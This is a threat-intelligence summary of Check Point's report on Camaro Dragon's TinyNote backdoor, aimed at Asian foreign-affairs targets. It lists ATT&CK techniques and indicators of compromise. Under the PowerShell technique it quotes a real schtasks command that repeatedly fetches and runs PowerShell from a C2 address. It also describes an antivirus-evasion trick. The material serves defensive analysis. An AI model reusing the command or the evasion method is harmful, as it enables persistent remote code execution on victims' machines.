Check Point Research traces Camaro Dragon activity to a Go-based backdoor named TinyNote used against Southeast and East Asian foreign affairs targets, detailing its multi-stage persistence and C2 infrastructure. The campaign includes SmadAV evasion, ties to MQsTTang infrastructure, and a two-mode backdoor design that emphasizes redundancy and ongoing command execution capabilities. #CamaroDragon #TinyNote #MQsTTang #SmadAV
Keypoints
- A Go-based backdoor called TinyNote was found on a Camaro Dragon distribution server and communicates with other Camaro Dragon C2s.
- TinyNote uses foreign affairs-themed file names and appears aimed at Southeast and East Asian embassies.
- The backdoor bypasses the Indonesian antivirus SmadAV using a crafted window trick: the process is made to appear as if it has a visible window, which is enough to evade the check.
- The malware establishes persistence with multiple scheduled tasks and uses multiple C2 servers to avoid a single point of failure.
- Collected data is encoded with a simple XOR using the key NASA and then Base64; C2 communication relies on HTTP(S), with commands returned in the server response and results sent back via POST.
MITRE Techniques
- [T1059.001] PowerShell – The malware uses PowerShell-based command execution, including retrieving and executing commands via scheduled tasks from C2: 'schtasks /Create /TN test /SC MINUTE /MO 15 /TR "powershell "$r=[System.Net.WebRequest]::Create("http://5.188.33.190/Robots.txt");(new-object System.IO.StreamReader(($r.GetResponse()).GetResponseStream())).ReadToEnd() | powershell.exe -noprofile -"" /f'
- [T1053.005] Scheduled Task/Job: Windows Task Scheduler – The sample creates two tasks to pull and execute PowerShell commands from robots.txt on multiple C2 servers to avoid single points of failure: ‘Next, the malware creates 2 scheduled tasks called test and test2 to retrieve and execute PowerShell commands, each retrieved from robots.txt from different C&C servers, most likely to eliminate a single point of failure’
- [T1027.001] Obfuscated/Compressed Files or Information – The enumeration data is encrypted with a simple XOR and Base64: ‘it encrypts the string using a simple XOR encryption algorithm with the key NASA and Base64 encodes it afterward.’
- [T1082] System Information Discovery – The backdoor enumerates system data (username, home folder, network interfaces) and concatenates it for exfiltration: ‘The malware enumerates the system for the following data and concatenates it to one string: The current system username; The current username home folder; The system’s network interfaces (name, MacAddress, description)’.
- [T1562.001] Impair Defenses – By bypassing SmadAV using a crafted window, the malware demonstrates defense evasion: ‘bypassSMADAV, whose purpose is to bypass the Indonesian antivirus Smadav.’
- [T1036] Masquerading – The use of a folder icon and naming conventions to mislead victims: ‘The samples also contain folder icon in an attempt to deceive victims about their real purpose.’
- [T1071.001] Web Protocols – The backdoor communicates with C2 over HTTP(S), including encoding/decoding command payloads and returning results: 'The expected result from the server is a JSON with the following structure: {"msg":"[BASE64-ENCODED COMMAND]"}' and subsequent POST of results.
Indicators of Compromise
- [Hash] f0b081ca58b6c253aa0014847c62dbad – TinyNote sample hash observed on Camaro Dragon distribution server
- [Hash] 6a2204b32a60aed0a3403c63ad2a529c – Another TinyNote sample hash
- [IPv4] 5.188.33.190 – One of the C2/RS servers referenced in the payload flow
- [IPv4] 103.169.90.132 – C2 server used by threat actors
- [IPv4] 103.159.132.91 – C2/MQsTTang-associated server
- [IPv4] 23.106.123.59 – Additional server used in distribution/infrastructure
Read more: https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/